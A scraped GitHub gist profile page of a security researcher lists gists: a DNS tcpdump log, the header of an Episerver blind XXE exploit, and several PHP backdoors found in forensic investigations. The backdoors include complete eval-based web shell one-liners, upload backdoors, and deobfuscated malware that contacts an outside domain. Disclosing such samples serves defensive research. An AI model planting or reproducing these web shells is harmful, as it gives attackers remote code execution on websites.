Jonas Lejon jonaslejon

🏠
Working from home
Block or report user

Report or block jonaslejon

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@jonaslejon
jonaslejon / dns-resolvers.txt
Last active Jun 25, 2018
DNS Resolvers with tcpdump output
## Resolver 1 Bahnhof
21:25:35.771950 IP 212.85.75.170.19496 > 79.99.X.X.53: 49195% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.153508 IP 212.85.75.170.55716 > 79.99.X.X.53: 26680% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.527427 IP 212.85.75.170.54433 > 79.99.X.X.53: 59891% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:37.279054 IP 212.85.75.170.21402 > 79.99.X.X.53: 44218% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.039318 IP 212.85.75.170.40338 > 79.99.X.X.53: 12866% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.771474 IP 212.85.75.170.25648 > 79.99.X.X.53: 42286% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:39.540317 IP 212.85.75.170.10337 > 79.99.X.X.53: 17760% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:40.276141 IP 212.85.75.170.57853 > 79.99.X.X.53: 29710% [1au] A? sfsdsdf.msg.triop.se. (49)
jonaslejon / episploit.py
Last active Aug 28, 2018
Episerver XXE Vulnerability - Exploit Episploit
#!/usr/bin/python
##
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
##
## Starts a listening webserver, so the exploit needs a public IP and an unfiltered port; configure RHOST below!
##
## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
##
## Usage: ./episploit.py <target> [file-to-read]
jonaslejon / wp-uninstall.php
Created Apr 8, 2018
WordPress backdoor found in file wp-uninstall.php
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject \n$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
jonaslejon / _input__test.php.
Created Oct 10, 2017
WordPress backdoor found during a forensic investigation of a blog. It was located in the folder wp-content/uploads/
<?php
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
jonaslejon / wp-blog-header.php
Last active Jul 7, 2018
Malware found on a WordPress installation. This is the deobfuscated version.
<?php @error_reporting(0);
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
if (array_key_exists('HTTP_TEST', $_SERVER)) {
echo (md5("TEST2016_CLICK"));
exit;
}
function fetch_urlDosNZ($url, $data) {
$content = '';
jonaslejon / file-upload.php
Created Feb 10, 2016
PHP file upload backdoor
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
jonaslejon / php-preg-replace-backdoor.php
Created Feb 10, 2016
Short PHP backdoor using preg_replace. Found during a forensic investigation.
<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');
jonaslejon / PHP-cookie-backdoor.php
Last active Dec 13, 2017
This is a PHP COOKIE backdoor that was found during a forensic investigation
jonaslejon / web-backdoor.php
Created Jan 11, 2016
Web PHP Malware found during forensic investigation
<?php
eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")
jonaslejon / php-upload.php
Created Jan 8, 2016
PHP file upload backdoor found during forensic investigation
<?php
ini_set('display_errors','Off');
error_reporting('E_ALL');
$multipart = "236c985403e7e1";
$part = "450be30e0288de41b6";
if (md5($_POST['multipart'])==$multipart.$part){
echo '
<div align="left">
<font size="1">:</font>
</div>